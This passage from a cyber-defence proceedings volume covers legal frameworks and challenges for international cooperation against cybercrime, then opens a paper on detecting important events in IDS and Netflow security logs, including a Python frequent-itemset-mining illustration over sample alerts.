The three above-mentioned elements let us gather that there is an assortment of legal rules (substantive national law as well as procedural law, and international agreements) that need to be in place before the discussion about the possibility of international cooperation can grow into a discussion about the efficiency of cooperation. Therefore, after briefly explaining the work of selected international organisations in the field of international cooperation, the article moves on to more concrete challenges and trends in the areas of jurisdiction, timeliness of response, education and awareness, mandate and duplication of networks.
3. International cooperation: Major international organisations active in the field

Generally speaking, international cooperation in criminal matters is built upon three pillars: multilateral treaties or conventions, bilateral treaties and relevant regional or organisational regulations (Ploom 2010). Such legal instruments typically set out the rules under which one state will provide legal assistance to another. The agreements may include provisions concerning the procedure for making requests, conditions on the use of the assistance as well as procedures for refusing the assistance. Traditionally, a request for international cooperation in criminal matters does not initiate a national criminal proceeding in the country receiving the request, since all the procedural acts remain within the regulatory framework of the requesting country. States may also use the option of entering “reservations”, which allow them to opt out from a specific provision and usually indicate the characteristics of the national law.

Furthermore, there are a great number of international organisations and their initiatives that shape the overall picture of international cooperation. As will be shown by the three brief examples below, the initiatives, their scope, aim and success vary a great deal, and thereby the current state of laws governing international criminal cooperation is still not wholly harmonized.

Additionally, the question arises whether the versatile legal framework already in place effectively tackles the challenges posed by the asymmetric nature of cyber crime. As mentioned above, there are a number of international legal mechanisms aiming at facilitating cooperation between nations in investigating and prosecuting criminal offences, but so far only a few of them have been put together with the specific intention of regulating the procedural elements of cyber crime.
3.1 United Nations

The United Nations Convention against Transnational Organized Crime (UN 2000) is the United Nations’ main international instrument in the fight against transnational organized crime and involves 147 signatory countries. The countries that have ratified the Convention commit themselves to taking a series of measures against transnational organized crime, including the creation of domestic criminal offences such as participation in an organized criminal group, the adoption of legal frameworks for extradition, mutual legal assistance and law enforcement cooperation, and the promotion of training and technical assistance for building or upgrading the necessary capacity of domestic authorities (UN 2004). In spite of the Convention not directly addressing cyber crime, the framework it sets forward is equally applicable to cyber crime offences.

Moreover, there have been discussions about the UN’s role in developing a purpose-built UN cyber crime treaty that would be open to ratification by all Member States. It is argued that such an initiative would not be unlikely, because many of the countries that are advanced in information technology would prefer to extend the reach of the Council of Europe’s convention to more countries and are struggling with common international cooperation measures, including the essential mutual legal assistance (Broadhurst 2006).

As a recent development, the United Nations convened in 2011 a UN Intergovernmental Expert Group on the issues related to cyber crime (including criminal cooperation) in order to assess the options to strengthen existing, and to propose new, national and international legal or other responses to cyber threats, i.e. to create a multilateral treaty similar to the Council of Europe’s Convention on Cyber Crime but involving a larger number of states. By now the states have agreed to undertake an ambitious comprehensive study on aspects of cyber crime and have scheduled the submission of the study to the Crime Commission by April 2013 (UNODC 2011).
3.2 Council of Europe

There are several Council of Europe (CoE) conventions that target the issue of cross-border cooperation in criminal matters. One of the most relevant is the Convention on Cybercrime (CoE 2001a) which, despite being originally designed as a regional mechanism, has proved to be an instrument of global significance (Keyser 2003). As a downside, even though many international organisations are promoting the Convention, the number of signatory countries is still relatively low. At the time of writing, 47 countries had signed and 30 had ratified the instrument.

As to the overall role of the Convention as a vehicle for international cooperation, the preamble of the Convention claims that the Convention is necessary “for the adoption of powers sufficient for effectively combating such criminal offences, by facilitating their detection, investigation and prosecution at both the domestic and international levels and by providing arrangements for fast and reliable international cooperation”. Yet, Article 23 of the Convention reminds us that the Convention’s primary goal is not to become a central instrument for international cooperation. According to the Convention, only in those cases where the existing treaties, laws and arrangements do not already contain such provisions is each Party required to establish a legal basis to enable the carrying out of international cooperation as defined by the Convention.

Besides listing general principles for international cooperation, the Convention states procedural provisions and tools for efficient investigations (expedited preservation of stored computer data, real-time collection of computer data, etc.), principles relating to 24/7 networks, extradition, mutual assistance, and procedures pertaining to mutual assistance requests in the absence of applicable international agreements.
3.3 European Union and European Police Office (Europol)

The European Union (EU) has traditionally concentrated mainly on establishing a common internal market, and therefore the majority of the legislative effort has been aimed at the harmonization of the legal landscape for that purpose. However, it also has competence within the justice and home affairs area (European Union 2000), even more remarkably since the entry into force of the Lisbon Treaty, and has in recent years taken notable initiatives in tackling attacks on information systems and critical infrastructure (European Union 2005). Due to its regional scope, the EU is an effective platform for introducing common standards to all Member States, and recent developments have indicated that the EU is moving towards reviewing and refining its framework on cyber crime.
One of the EU initiatives aiming at harmonizing cross-border cooperation is the European Police Office (Europol), which aims to support the EU Member States in preventing and combating all forms of serious international crime and terrorism, including high-tech and cyber crime (European Union 2009). Mainly, Europol is tasked with improving the effectiveness and cooperation of competent Member State authorities, and its overall role is to help achieve a safer Europe by supporting EU law enforcement authorities through the exchange and analysis of criminal intelligence (Europol 2010a).

Regarding its mandate, Europol officers do not have direct powers of arrest but instead support the European law enforcement agencies by gathering, analysing and disseminating information and coordinating operations. Additionally, it appears common practice for Europol’s experts and analysts to take part in Joint Investigation Teams solving criminal cases EU-wide.

Importantly, the Council of the European Union decided in 2009 to transform Europol into an official EU agency. Responding to criticism directed at the lack of transparency and democratic accountability of Europol (Schaerlaekens 2009), the decision has triggered several changes in Europol’s legal framework, mainly undertaken in order to simplify and improve Europol’s previous structure.

The expansion of Europol’s mandate and its focusing to a greater extent on the fight against cyber crime should be regarded as a significant development for EU law enforcement authorities. Europol’s objective to become the principal EU support centre for law enforcement operations (Europol 2010b), and proposals to establish the European Union Cybercrime Task Force as well as the European Cybercrime Centre, suggest that the EU is seeking to improve the current approach to the fight against cyber crime and render it more effective and consistent.
4. Major challenges and trends<br />
International organisations that were discussed above illustrate the various approaches <strong>in</strong>itiated on<br />
regional and <strong>in</strong>ternational level. However, most of the urgent challenges <strong>in</strong> the field of <strong>in</strong>ternational<br />
cooperation have their roots <strong>in</strong> domestic legislation and the implementation of multilaterally agreed<br />
pr<strong>in</strong>ciples <strong>in</strong> the national framework. Without go<strong>in</strong>g <strong>in</strong>to details with specific procedural problems with<strong>in</strong><br />
the <strong>in</strong>vestigation and prosecution phases, such as search and seizure procedures, expedited<br />
preservation of computer data, disclosure of stored data, <strong>in</strong>terception of content data and collection of<br />
traffic data (Russell et al. 2004), the article lists some of the most common challenges that are connected<br />
with the general aspects of <strong>in</strong>ternational cooperation with<strong>in</strong> the context of cyber crime. These challenges<br />
give way to several trends <strong>in</strong> the <strong>in</strong>ternational crim<strong>in</strong>al cooperation and lead to assumptions on further<br />
developments.<br />
4.1 Jurisdiction
Cyberspace has challenged the fundamental principle of territorial jurisdiction (Brenner 2010), and as the nature of the Internet disregards national borders, or even encourages spreading activities over several countries, criminal investigations are facing complex jurisdictional puzzles.
In prosecuting cases of cyber crime, the main problem seems to derive from the nature of modern computer and telecommunications technology, where the structure of networks and the methods of data transmission create uncertainty about where the criminalised acts occurred in the first place. A well-known example of this is the Levin case, where Citibank suffered serious breaches of security in its cash management system and the offender was arrested in the UK and later extradited to the US (Cryer et al. 2007).
Moreover, even when both the offender and the victim reside in the same country, part of the evidence may still be located on a foreign server. Thus, with the option of directing data traffic through networks located worldwide, perpetrators can plan a suitable chain of cyber activity in which the origin and jurisdiction of the relevant actors would first of all be difficult to determine and, secondly, involve countries with a favourable profile (Kaska, Tikk 2009). To tackle this, the harmonisation of the laws addressing cyber crime plays an important role in the procedural elements of criminal cooperation, as questions of jurisdiction are either addressed directly by national legislation or solved by the interpretation of general principles of international law.
256
Anna-Maria Talihärm
However, one should keep in mind that for several reasons jurisdiction may end up being only a formal element of a problematic international prosecution (Brenner, Koops 2004). Recent case studies have underlined that even if the undesirable conduct is criminalised in the domestic law of the country that aims to initiate the prosecution as well as in the recipient jurisdiction, problems may still occur at the political level. Therefore, as in any other investigation, a lack of political will to cooperate on the part of the requested country or entity may significantly slow down or even disable the investigation and prosecution of a cyber incident (Tikk, Kaska 2009).
Thereby, the traditional principles of territoriality, nationality and passive personality may no longer be directly or strictly applicable in solving cyber incidents. Countries seem to be more willing to extend the reach of the relevant offences beyond the traditional jurisdiction principles such as those stated in the CoE Convention on Cybercrime, and, as suggested by Ian Walden, states are thus losing to some extent the "de jure control" over their sovereign territory and trading it for an extended jurisdictional reach (Walden 2006).
4.2 Timeliness of the response
Based on the concerns of the relevant national and international organisations, one of the key demands in transnational investigations is the immediate reaction of the counterparts in the country where the offender is located. Practice has shown that when it comes to responding quickly to official requests, e.g. for information exchange, the traditional instruments of mutual legal assistance in most cases do not meet the speed required by investigations on the Internet and may thus jeopardise the investigation of the offence.
If the location of the attacker has been identified, the least time-consuming way forward usually entails the cooperation of law enforcement agencies through a joint investigation team. Using informal networks and contacts might yield a faster response but does not always permit the use of such evidence in criminal proceedings. This brings with it several problems concerning the usability of evidence that has not been obtained via official procedures, and underlines the amount of time that characterises official requests for mutual legal assistance. Considering the time-critical nature of cyber crime, waiting six months to receive the requested information through the current official procedures does not satisfy the needs of the investigation and prosecution of cyber crime (Pau 2011).
A similar challenge is the lack of harmonisation of the legal framework regulating data retention requirements for ISPs. Despite the efforts of the EU Data Retention Directive (European Union 2006), the obligations of ISPs with respect to the retention of certain data may vary to a great degree (Pau 2011) and therefore do not always guarantee the availability of such data for the purposes of investigation, detection and prosecution.
Among other options, solutions to such issues may include establishing practical and effective cooperation networks. Moreover, according to the CoE's study, in order to render international cooperation more effective, a set of practices should be used to establish uniformity of interactions between different stakeholders (CoE 2008). A recent example of such cooperation between the Estonian Computer Emergency Response Team (CERT) and one of the biggest local ISPs shows that public-private partnership enhances an ISP's ability to promptly inform its customers about possible security threats (Elion 2011). Another example of improving cooperation between the public and private spheres is the Estonian Cyber Defence League (CDL 2010).
4.3 Education and awareness
Not surprisingly, education and awareness of the complex spectrum of cyber threats form one of the biggest challenges for effective international cooperation. The level of knowledge and expertise varies between agencies and may cause significant problems in communication, in the quality of information sharing and in decision-making. For example, law enforcement agencies may not have the capacity to develop the internal expertise needed for communication with ISPs (CoE 2008), or the judicial system may not have the technical knowledge to interpret the facts of the case correctly.
Similarly, the lack of harmonised measures and procedural rules has left the majority of stakeholders confused about the legal framework surrounding cyber crime and criminal cooperation. Law enforcement agencies in particular are struggling with refining the legally and technically possible measures that can be used in investigating crimes carried out via, or targeting, computer systems. One among the many examples in this field is the Spanish case of law enforcement agencies conducting warrantless Internet searches within a peer-to-peer file sharing programme in order to locate child pornography material. In 2007, the Tarragona Regional Court questioned such police actions and ruled the defendant innocent, as the police actions were determined by the Court to have caused serious harm to the defendant's fundamental right to secrecy of communications. However, in 2008 the Supreme Court overruled this decision and stated that the purpose of these searches was to unveil the concealed identity of those who had access to such files, and that access to such information, considered illegal or unlawful, may be carried out by any user since the information is public and had been disclosed by the user itself (Europa Press 2008).
Therefore, as underlined by the UN Intergovernmental Expert Group, there is a continuous need for more research, awareness about international instruments as well as guidance on proper interpretation and implementation (UNODC 2011).
4.4 Mandate
Analyses of recent international developments have indicated that more and more nations and institutions are realizing the importance of international criminal cooperation in the context of cyber crime (Portnoy, Goodman 2009). One proof of this trend is that a growing number of national Computer Emergency Response Teams (CERTs) are being set up and their operational powers are being increased. Augmenting the mandate of other cyber crime related institutions is also a clear sign of governments paying more attention to the coordination of international cooperation. Recent examples are the European Union seeking to improve its institutional framework in the field, and Estonia following the trend by upgrading the Estonian Information Centre from a ministry-administered state agency into a government agency with autonomous executive powers (Pesur 2010).
4.5 Duplication of expert efforts
The G8 was one of the first – followed by the CoE, Interpol and others – to initiate a 24/7 network of cyber crime experts designed to facilitate communication and investigations between law enforcement agencies of different jurisdictions. The main idea of such a network is that even when the preliminary communication is on an informal basis, it can be carried out in a time-critical fashion. In the domain of transnational crime, such timely consultation may greatly help to reduce duplication of effort, unnecessary inconvenience for witnesses and possible competition among the law enforcement agencies of the states concerned (CoE 2001b).
However, there are several concerns regarding the functioning of these networks, such as the technical and legal competence of the contact points and the need for constantly updated contact information. An even more urgent problem seems to be the confusion created by the partial overlap of different networks, such as the G8 and CoE contact lists. Despite efforts to merge the two networks, the contact lists have remained separate due to "a wider scope of functions of 24/7 contact points under the Cybercrime Convention" (T-CY 2010).
The threat of duplication of expert efforts can also be observed in the field of criminal procedure, where one of the main concerns is obtaining evidence in a transnational context. This can be improved by analysing the current demands of law enforcement agencies for specific investigative provisions relating to cyber crime and proposing the necessary changes to multi- and bilateral agreements. Both formal and informal networks may benefit international cooperation, provided that sufficient standards and updated contact information for communication are set.
5. Conclusion
Cyber crime does not always involve the traditional elements of a crime and hence even determining what should be considered an international matter in cyber crime cases is not always straightforward. It is therefore vital that a thorough review of substantive and procedural law be undertaken at the national level before international cooperation can be effective, or even possible.
In addition to domestic legislation, investigating and prosecuting cyber incidents rarely involves only one country, and the widening range of cyber crime examples underlines the importance of a global network and cooperation. The comparison of various international instruments has proved that multilateral treaties are the most common and arguably most useful vehicles for harmonising national material law and minimising the differences in domestic approaches to substantive cyber crime and the relevant procedural aspects.
However, as illustrated by the small number of ratifications of the Council of Europe Convention on Cybercrime, the practical applicability of the legal suggestions in the Convention is often questionable. Therefore, an analysis of alternative international vehicles must be undertaken, and the primary international legal obstacles, such as the lack of requisite procedural rules and the need for effective means of communication, addressed.
Additional challenges include questions of jurisdiction which, despite possibly being considered merely a formal element of criminal cooperation, still remain the key to refining the scope of international cooperation. It is clear that even if the identification of the source and technical attribution have been successful, in the end it is international cooperation that leads to the capture of the criminal. Lately, countries seem to be more willing to review the traditional jurisdiction principles in order to gain extended jurisdictional reach.
Also, uncertainties related to the implementation of the existing multi- and bilateral agreements do not benefit international cooperation. In terms of criminal procedure, one of the main concerns is to improve the obtaining of evidence in a transnational context. Thus, states are working on refining and improving the legally and technically possible measures that can be used in prosecuting and investigating cyber crime.
Analyses of recent international developments indicate that more and more nations and institutions are realizing the importance of international criminal cooperation in the context of cyber crime, and public-private partnerships as well as other formal and informal networks are increasingly contributing to solving both national and international cyber incidents. Thus, another visible trend of criminal cooperation in the field of cyber crime is the increasing number and the expanding mandate of specialised agencies addressing cyber crime issues.
The challenges and trends above point to the overall need for more research, awareness about international instruments as well as guidance toward proper interpretation and implementation. Perhaps most importantly, these trends demonstrate that better coordination between the relevant international organisations and a comprehensive understanding of the already existing legal instruments would greatly benefit the current state of international criminal cooperation in the cyber domain.
Disclaimer
The opinions expressed here are those of the author and should not be considered as the official policy of the Cooperative Cyber Defence Centre of Excellence or NATO.
References
Blomfield, A. (2007). Estonia Calls for NATO Cyber-terrorism Strategy. Available at: http://www.telegraph.co.uk/news/worldnews/1551963/Estonia-calls-for-Nato-cyber-terrorism-strategy.html.
Brenner, S. W. (2010). Cybercrime: Criminal Threats from Cyberspace. ABC-CLIO, California.
Brenner, S. W. and Koops, B.-J. (2004). "Approaches to Cybercrime Jurisdiction". Journal of High Technology Law, Vol. 4, No. 1.
Broadhurst, R. (2006). "Developments in the global law enforcement of cyber-crime". An International Journal of Police Strategies and Management, 29(2), pp. 408-433.
CDL (2010). Cyber Defence League. Available at: http://www.kaitseliit.ee/index.php?op=body&cat_id=395.
European Union (2000). Council Act of 29 May 2000 establishing in accordance with Article 34 of the Treaty on European Union the Convention on Mutual Assistance in Criminal Matters between the Member States of the European Union.
Council of Europe (2001a). Convention on Cybercrime. Available at: http://conventions.coe.int/treaty/en/treaties/html/185.htm.
Council of Europe (2001b). Convention on Cybercrime explanatory report. Available at: http://conventions.coe.int/treaty/en/reports/html/185.htm.
European Union (2005). Council Framework Decision 2005/222/JHA of 24 February 2005 on attacks against information systems. Official Journal L 69, 67-71.
European Union (2006). Directive 2006/24/EC of the European Parliament and of the Council of 15 March 2006 on the retention of data generated or processed in connection with the provision of publicly available electronic communications services or of public communications networks and amending. Official Journal L 105, 54-63.
Council of Europe (2008). Law enforcement – Internet service provider cooperation in the investigation of cybercrime. Available at: http://www.coe.int/t/dghl/cooperation/economiccrime/cybercrime/Documents/LEA_ISP/default_en.asp.
Cryer, R. et al. (2007). An Introduction to International Criminal Law and Procedure. Cambridge University Press.
Cybercrime Convention Committee (T-CY) (2010). Fifth meeting, Paris, 24-25 June 2010.
Elion (2011). Elion alustab arvutiviiruste ja pahavara vastest ennetustööd. Available at: http://www.elion.ee/wwwmain?screenId=html.businessprofile.news&componentId=&actionId=&actionParam=49074&menuId=&locale=et&.
Europa Press (2008). Green light to warrantless internet searches by the police. Available at: http://www.madrid.org/cs/Satellite?c=CM_Revista_FP&cid=1142465573929&esArticulo=true&idRevistaElegida=1142432125406&language=en&pagename=RevistaDatosPersonalesIngles%2FPage%2FRDPI_home_RDP&siteName=RevistaDatosPersonalesIngles.
European Union (2009). Annex of Council Decision of 6 April 2009 establishing the European Police Office (Europol), 2009/371/JHA, listing forms of serious crime which Europol is competent to deal with in accordance with Article 4(1) of the Council Decision.
Europol (2010a). Europol Overview. Available at: http://www.europol.europa.eu/index.asp?page=ataglance&language=.
Europol (2010b). Europol Strategy 2010–2014. Available at: http://register.consilium.europa.eu/pdf/en/10/st06/st06517.en10.pdf.
Kaska, K., Talihärm, A.-M. and Tikk, E. (2010). Building a Comprehensive Approach to Cyber Security. CCD COE Publications, Tallinn.
Keyser, M. (2003). "The Council of Europe Convention on Cybercrime". Journal of Transnational Law & Policy, Vol. 12, No. 2, p. 289.
Pau, E. (2011). Interview with Ms Eneli Pau, Estonian Northern District Prosecutor's Office, Assistant Prosecutor. Conducted in January 2011 via email.
Pesur, V. (2010). Infosüsteemide arenduskeskus saab võimu juurde. Postimees Online, 13 May 2010. Available at: http://www.postimees.ee/?id=262349.
Ploom, T. (2010). Strasbourgi konventsioonist Lissaboni lepinguni, rahvusvaheline koostöö kriminaalasjades. Kirjastus Juura.
Portnoy, M. and Goodman, S. (2009). Global Initiatives to Secure Cyberspace: An Emerging Landscape. Springer Science+Business Media.
Russell, S. et al. (2004). Cyber Criminals on Trial. Cambridge University Press.
Schaerlaekens, L. (2009). "OLAF and its Cooperation with Institutions of New Member States", in Apap, J. (ed.), Justice and Home Affairs in the EU: Liberty and Security Issues after Enlargement, p. 161.
Tikk, E. and Kaska, K. (2010). "Legal Cooperation to Investigate Cyber Incidents: Estonian Case Study and Lessons". Proceedings of the 9th European Conference on Information Warfare and Security, Thessaloniki, pp. 288-295.
Tikk, E., Kaska, K. and Vihul, L. (2010). International Cyber Incidents: Legal Considerations. CCD COE Publications, Tallinn.
United Nations (1994). International review of criminal policy – United Nations Manual on the prevention and control of computer-related crime. No. 43/44.
United Nations (2000). Convention against Transnational Organized Crime, adopted by General Assembly resolution 55/25 of 15 November 2000.
United Nations (2004). Legislative Guides for the Implementation of the United Nations Convention against Transnational Organized Crime. Available at: www.unodc.org/pdf/crime/legislative_guides/Legislative%20guides_Full%20version.pdf.
UNODC (2011). Open-ended Intergovernmental Expert Group on Cybercrime. Available at: http://unodc.org/unodc/en/treaties/expert-group-on-cybercrime.html.
Methods for Detecting Important Events and Knowledge From Data Security Logs
Risto Vaarandi
CCD COE, Tallinn, Estonia
risto.vaarandi@ccdcoe.org
Abstract: In modern computer networks and IT systems, event logging is commonly used for collecting system health information in order to ease the system management process. For example, many sites collect events and network flow records from their applications, servers and network devices over protocols like syslog, SNMP and Netflow, and analyze these data at central monitoring server(s). Among the collected data, many events and records provide information about security incidents. Unfortunately, during the last decade security logs have grown rapidly in size, making manual analysis an extremely labor-intensive task. This task is further complicated by the large number of irrelevant records and false positive alerts in security logs. For this reason, the development of methods for detecting important events and knowledge from security logs has become a key research issue in recent years. In this paper, we propose some methods for tackling this issue in the context of IDS and Netflow logs from an organizational network. The first contribution of this paper is the study of important properties of IDS and Netflow logs. We have conducted our analysis on a number of production system logs obtained from a large financial institution, and some of our findings are supported by results from other researchers. The second contribution of the paper is the proposal of several data mining based and heuristic methods for event and knowledge detection from security logs. Our data mining methods are based on frequent itemset mining for identifying regularities in IDS alert sets and network traffic. These regularities are then used for finding unexpected IDS alert patterns and prominent network traffic flows. In this paper, we also discuss the implementations of the proposed methods in a production environment, and provide performance estimates for our implementations. We conclude the paper with a short discussion of some promising directions for further research.
Keywords: data mining, security log analysis
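The abstract describes finding regularities in IDS alert sets with frequent itemset mining and then using them to flag unexpected alert patterns. The following is an added illustration of that idea, not code from the paper: a level-wise (Apriori-style) miner over constructed alert records reduced to three attributes (signature name, source network, destination port), followed by a pass that reports the alerts matching none of the frequent attribute combinations. The alert set, the attribute names, the support threshold and the "not covered by any frequent pattern" rule are assumptions made for this example; the paper's own algorithms are presented in its section 4.

```python
"""Frequent itemset mining over IDS alert records (added illustration).

Each alert is turned into a transaction of 'attribute=value' items, frequent
itemsets are found level by level with Apriori pruning, and alerts that match
no frequent pattern are reported as unexpected. All data is constructed.
"""
from collections import Counter
from itertools import combinations

# Constructed IDS alerts, reduced to the attributes we mine over.
SAMPLE_ALERTS = [
    {"sig": "HTTP robots.txt request", "src": "10.1.0.0/16", "dport": "80"},
    {"sig": "HTTP robots.txt request", "src": "10.1.0.0/16", "dport": "80"},
    {"sig": "HTTP robots.txt request", "src": "10.1.0.0/16", "dport": "80"},
    {"sig": "HTTP robots.txt request", "src": "10.1.0.0/16", "dport": "80"},
    {"sig": "DNS oversized query", "src": "10.2.0.0/16", "dport": "53"},
    {"sig": "DNS oversized query", "src": "10.2.0.0/16", "dport": "53"},
    {"sig": "DNS oversized query", "src": "10.2.0.0/16", "dport": "53"},
    {"sig": "DNS oversized query", "src": "10.3.0.0/16", "dport": "53"},
    {"sig": "SSH brute force attempt", "src": "10.4.0.0/16", "dport": "22"},
    {"sig": "HTTP robots.txt request", "src": "10.5.0.0/16", "dport": "443"},
]


def alert_items(alert):
    """One alert as a transaction: a set of 'attribute=value' items.

    Prefixing with the attribute name keeps items from different columns
    apart (a port "53" and a hypothetical signature "53" never collide).
    """
    return frozenset(f"{key}={value}" for key, value in alert.items())


def frequent_itemsets(transactions, min_support):
    """Return {itemset: support} for every itemset with support >= min_support.

    Level-wise search: frequent k-itemsets are joined into (k+1)-candidates,
    a candidate survives only if all of its k-subsets are frequent (Apriori
    pruning), and survivors are counted against the transactions.
    """
    result = {}
    counts = Counter(item for t in transactions for item in t)
    current = {frozenset([item]) for item, n in counts.items() if n >= min_support}
    for itemset in current:
        result[itemset] = counts[next(iter(itemset))]
    k = 1
    while current:
        candidates = set()
        for a, b in combinations(sorted(current, key=sorted), 2):
            union = a | b
            if len(union) == k + 1 and all(
                frozenset(sub) in current for sub in combinations(union, k)
            ):
                candidates.add(union)
        counts = Counter()
        for t in transactions:
            for cand in candidates:
                if cand <= t:
                    counts[cand] += 1
        current = {cand for cand, n in counts.items() if n >= min_support}
        for cand in current:
            result[cand] = counts[cand]
        k += 1
    return result


def mine_alerts(alerts, min_support):
    """Frequent attribute combinations across a set of alerts."""
    return frequent_itemsets([alert_items(a) for a in alerts], min_support)


def unexpected_alerts(alerts, patterns, min_items=2):
    """Alerts covered by no frequent pattern of at least min_items attributes.

    These fall outside the regular background of the alert set and are the
    ones an analyst would look at first.
    """
    big = [p for p in patterns if len(p) >= min_items]
    return [a for a in alerts if not any(p <= alert_items(a) for p in big)]


if __name__ == "__main__":
    found = mine_alerts(SAMPLE_ALERTS, min_support=3)
    for itemset, support in sorted(found.items(), key=lambda kv: (-len(kv[0]), -kv[1])):
        print(support, sorted(itemset))
    for alert in unexpected_alerts(SAMPLE_ALERTS, found):
        print("unexpected:", alert)
```

With min_support=3 the miner finds 14 frequent itemsets, among them the full three-attribute patterns behind the repeated web and DNS alerts. The SSH alert and the robots.txt alert on port 443 match no pattern of two or more attributes and are reported for review; raising min_items to 3 additionally surfaces the DNS alert from the unusual source network, which shares the signature and port of the frequent pattern but not its source.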
1. Introduction
In modern computer networks and IT systems, one of the key security management techniques is network monitoring for detecting unwanted, malicious or anomalous traffic. Two widely employed methods for network monitoring are the use of a network intrusion detection system (IDS) and the collection of network traffic information with protocols like Netflow or IPFIX. A network IDS sensor performs deep packet inspection (DPI) for a network segment – for every packet that traverses the segment, the sensor analyzes both the packet headers and its payload. Most network IDSs use a signature-based approach for DPI – human experts write packet matching conditions (signatures) in order to recognize known bad traffic (e.g., a signature could be a regular expression for matching the packet payload). When network traffic matches a signature, the IDS triggers an alert which is typically sent to the central network management server. Unfortunately, IDSs are known to generate large volumes of alerts – for example, a single IDS sensor can emit hundreds of thousands of alerts per day (Vaarandi and Podiņš 2010; Viinikka, Debar, Mé, Lehikoinen and Tarvainen 2009). Furthermore, usually the majority of these alerts are false positives or irrelevant (Julisch 2001; Long, Schwartz and Stoecklin 2006; Vaarandi and Podiņš 2010). Therefore, the manual review of IDS logs is often impossible.
In contrast, when network traffic information is collected from routers, switches or dedicated network<br />
probes (with a protocol like Netflow), only data from packet headers are considered. For example, a<br />
Netflow record contains a transport protocol ID (e.g., 6 for TCP), source and destination IP addresses,<br />
source and destination ports (if supported by the transport protocol), and a few other fields. A Netflow record<br />
is created when the network device first observes a relevant traffic flow (e.g., a TCP connection is<br />
established from the workstation 10.2.1.13 port 21892 to the web server 10.1.1.1 port 80). Typically, the<br />
network device sends the record to the central network management host when the activity or inactivity timer<br />
expires for the flow (e.g., no packets have travelled from source to destination during 15 seconds), when<br />
the flow table becomes full, or when the flow ends (e.g., the corresponding TCP connection is<br />
terminated). Since collecting network traffic information does not involve packet payload analysis, it<br />
requires much less computing resources than DPI. However, since in larger networks many millions of<br />
flow records can be created within a short amount of time (Wagner 2008), processing and storing these<br />
records is expensive in terms of CPU time and disk space. In order to reduce these costs, packet<br />
sampling is usually employed in very large networks – traffic information is only extracted from a fraction<br />
of packets (e.g., 0.1%). Nevertheless, packet sampling is often not used in the context of network security<br />
261
Risto Vaarandi<br />
monitoring, since recording all network packet flows between peers allows for the<br />
detection of unusual traffic patterns.<br />
In this paper, we will focus on IDS and Netflow log analysis for organizational networks. We will first study<br />
important properties of IDS and Netflow logs and will show that these data sets are prone to contain<br />
strong patterns. We will then propose several heuristic and data mining based algorithms for analyzing<br />
these logs. The remainder of this paper is organized as follows – section 2 describes related work,<br />
section 3 focuses on properties of IDS and Netflow logs, section 4 describes log analysis algorithms<br />
which harness these properties, and section 5 concludes the paper.<br />
2. Related work<br />
Since IDS and Netflow logs contain large volumes of data and it is highly impractical to review these logs<br />
manually, their analysis has attracted a considerable amount of attention in the research community. A<br />
number of methods have been proposed during the last decade, including machine learning (Pietraszek<br />
2004), time series analysis (Viinikka, Debar, Mé and Séguier 2006; Viinikka, Debar, Mé, Lehikoinen and<br />
Tarvainen 2009), the application of EWMA control charts (Viinikka and Debar 2004), visualization (Taylor,<br />
Paterson, Glanfield, Gates, Brooks and McHugh 2009), the use of the locality paradigm (McHugh and Gates<br />
2003) and the chronicles formalism (Morin and Debar 2003), the application of game theory (Wagner,<br />
Wagener, State, Engel and Dulaunoy 2010), graph based methods (Ning, Cui and Reeves 2002), etc.<br />
Among recently proposed methods, data mining algorithms have often been suggested for IDS alert logs.<br />
With these methods, IDS alert logs are mined for previously unknown regularities and irregularities. This<br />
knowledge is then used by human experts for writing event correlation rules which highlight important<br />
alerts and filter out large volumes of false positives and other irrelevant alerts. Long, Schwartz and<br />
Stoecklin have developed a supervised clustering algorithm for distinguishing Snort IDS true alerts from<br />
false positives (Long, Schwartz and Stoecklin 2006). Treinen and Thurimella have investigated the<br />
application of association rule mining, in order to detect knowledge for writing event correlation rules for<br />
novel attack types (Treinen and Thurimella 2006). Clifton and Gengo have suggested a similar approach<br />
for creating IDS alert filters (Clifton and Gengo 2000). Julisch and Dacier have proposed a conceptual<br />
clustering technique for IDS alert logs (Julisch 2001; Julisch and Dacier 2002; Julisch 2003). With this<br />
approach, detected clusters correspond to alert descriptions, and the human expert can use them for<br />
developing filtering and correlation rules for future IDS alerts. Al-Mamory, Zhang and Abbas have<br />
proposed clustering algorithms for finding generalized alarms which help the human analyst to build filters<br />
(Al-Mamory, Zhang and Abbas 2008; Al-Mamory and Zhang 2009). Vaarandi and Podiņš have developed<br />
a novel data mining based method for IDS alert classification (Vaarandi and Podiņš 2010). The method<br />
fully automates the knowledge interpretation process which has traditionally been carried out by human<br />
experts, and derives alert classification rules without human intervention. These rules are used for<br />
distinguishing important alerts from irrelevant ones.<br />
Various data mining methods have also been proposed for the analysis of Netflow logs. Wagner has<br />
applied entropy measurement techniques to Netflow data, in order to detect worms in fast IP networks<br />
(Wagner 2008). Paredes-Oliva et al. have employed a frequent itemset mining algorithm for identifying<br />
traffic flows that are root-causes of network security anomalies (Paredes-Oliva, Dimitritopoulos, Molina,<br />
Barlet-Ros and Brauckhoff 2010). Li and Deng have proposed several frequent pattern mining algorithms,<br />
in order to detect network anomalies (Li and Deng 2010). Also, Vaarandi has proposed frequent itemset<br />
mining for automated close-to-real-time identification of strong traffic patterns from Netflow logs (Vaarandi<br />
2008).<br />
3. Properties of IDS and Netflow logs<br />
During our experiments, we have discovered several important properties of IDS and Netflow logs which<br />
are confirmed by findings of other researchers. When investigating the properties of IDS alert log data,<br />
we reviewed the yearly logs of three IDS sensors from a large financial institution. The sensors had more<br />
than 15,000 signatures and were deployed in different locations (both in the intranet and on the public Internet). Two<br />
logs contained more than 50 million alerts and one log more than 2 million alerts.<br />
Firstly, we found that the majority of the alerts were triggered only by a few signatures – the 10 most verbose<br />
signatures created more than 95% of alerts for two sensors and more than 80% of alerts for one sensor.<br />
Other researchers have reported similar findings – in (Viinikka, Debar, Mé and Séguier 2006) it was<br />
found that 5 signatures produced 68% of alerts, while in (Viinikka, Debar, Mé, Lehikoinen and Tarvainen<br />
2009) the authors discovered that 7 signatures produced 78% of alerts. Secondly, we found that prolific<br />
signatures usually trigger large volumes of alerts over longer periods of time. For the three aforementioned<br />
sensors, less than 25 signatures triggered alerts for more than 300 days during a 1 year period, and these<br />
alerts constituted 70-90% of entries in the logs. Finally, the vast majority of these verbose signatures trigger<br />
false positives or irrelevant alerts. In our experimental environment, we found that they are mostly related<br />
either to well-known threats (such as the MS Slammer Sapphire worm) or legitimate network traffic (like<br />
SNMP queries from network management servers). Similar findings have also been reported in (Viinikka,<br />
Debar, Mé, Lehikoinen and Tarvainen 2009). Therefore, IDS alert logs contain strong patterns in many<br />
